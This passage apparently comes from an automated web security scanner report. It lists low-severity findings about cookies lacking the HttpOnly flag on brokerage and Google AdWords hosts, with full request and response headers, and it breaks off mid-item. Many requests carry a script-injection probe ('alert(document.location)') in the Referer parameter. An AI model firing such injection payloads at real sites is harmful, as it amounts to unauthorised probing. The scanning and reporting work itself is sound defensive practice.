GET /images/styles/bubble/tl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 117
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "d0d71abd1bfcca1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AFEC1DFC41D58A640965F69675769361; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a..........f...........y...e........d.x...2..h.........!......,.........."..I+1%.........%.#.@..fu(...1.h..F.;

10.40. https://account.optionsxpress.com/images/styles/bubble/tr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tr.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "90ac1cbd1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9A7796FB49428C50E2B66E9C59EA7A3A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
.......f................................x..m...........-...........f..R..b...........................!.......,....
.....% .X.#.W
..3.B. .P......0...P.%V..a ...;

10.41. https://account.optionsxpress.com/images/welcome/home/log_out.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/
Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

10.42. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CF5297BD4EE7D9842FB52BA82A45D6B5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:25 GMT

GIF89a.............!.......,...........D..;

10.43. https://account.optionsxpress.com/inc/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=D89622F2452C5128A6EE59B41762E5D5

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6BF746C24651B1BAD934E8B86A795596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:24 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

10.44. https://account.optionsxpress.com/inc/interface.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...

10.45. https://account.optionsxpress.com/inc/js/plugins/accordion.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/accordion.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/accordion.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 9587
Content-Type: application/x-javascript
Last-Modified: Tue, 11 May 2010 17:47:22 GMT
Accept-Ranges: bytes
ETag: "c07627232f1ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* jQuery UI Accordion 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http:
...[SNIP]...

10.46. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/jquery.blockUI.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/jquery.blockUI.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 15677
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:56:04 GMT
Accept-Ranges: bytes
ETag: "709b2a3483f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.../*!
* jQuery blockUI plugin
* Version 2.31 (06-JAN-2010)
* @requires jQuery v1.2.3 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2008 M. Alsup
* Dual
...[SNIP]...

10.47. https://account.optionsxpress.com/inc/newaccount/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/general.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/general.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 75328
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "f02bedc582f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* Include general.js */
var s;
s = "<script language=\"javascript\" type=\"text/javascript\" src=\"/inc/general.js\"></script>";        
document.write(s);

/******************************************
...[SNIP]...

10.48. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquer.ui.all.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/newaccount/jquer.ui.all.css HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:22 GMT; path=/
Set-Cookie: TLTHID=DC968495491D236FAF80D1B2AC99C2C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

10.49. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery-1.3.2.min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 59326
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "107aedc582f0ca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
*
* Copyright (c) 2009 John Resig, http://jquery.com/
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this softw
...[SNIP]...

10.50. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.autotab.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.autotab.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 3628
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "602a83c682f0ca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery AutoTab plugin
* http://dev.lousyllama.com/auto-tab
*
* Copyright (c) 2007 Matthew Miller
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.
...[SNIP]...

10.51. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.scrollTo-min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.scrollTo-min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 2262
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Apr 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "f043f15fa7e8ca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

10.52. https://account.optionsxpress.com/inc/newaccount/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/styles.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/styles.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 13213
Content-Type: text/css
Last-Modified: Tue, 23 Nov 2010 16:59:49 GMT
Accept-Ranges: bytes
ETag: "f74a6d62f8bcb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*    
   Purpose:    Styles for the new account process. Shared for all sites.
   Created by: Shawn Roser
   Date:        2/9/2005
*/

/* Style Redefinitions */

/*body { background: #EBEBEB; text-align: ce
...[SNIP]...

10.53. https://account.optionsxpress.com/inc/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/s_code.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 40455
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jun 2011 15:21:04 GMT
Accept-Ranges: bytes
ETag: "0b0f8832625cc1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* global JS methods */
Array.prototype.indexOf = function (obj) {
   for (var i = 0; i < this.length; i++) {
       if (this[i] == obj) return i;
   }
   return -1;
}
Array.prototype.has = function (obj)
...[SNIP]...

10.54. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Sep 2011 19:45:19 GMT
Expires: Thu, 08 Sep 2011 19:45:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

10.55. https://cwt1.interactivebrokers.com/webtrader2/servlet/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cwt1.interactivebrokers.com
Path:   /webtrader2/servlet/login

Issue detail

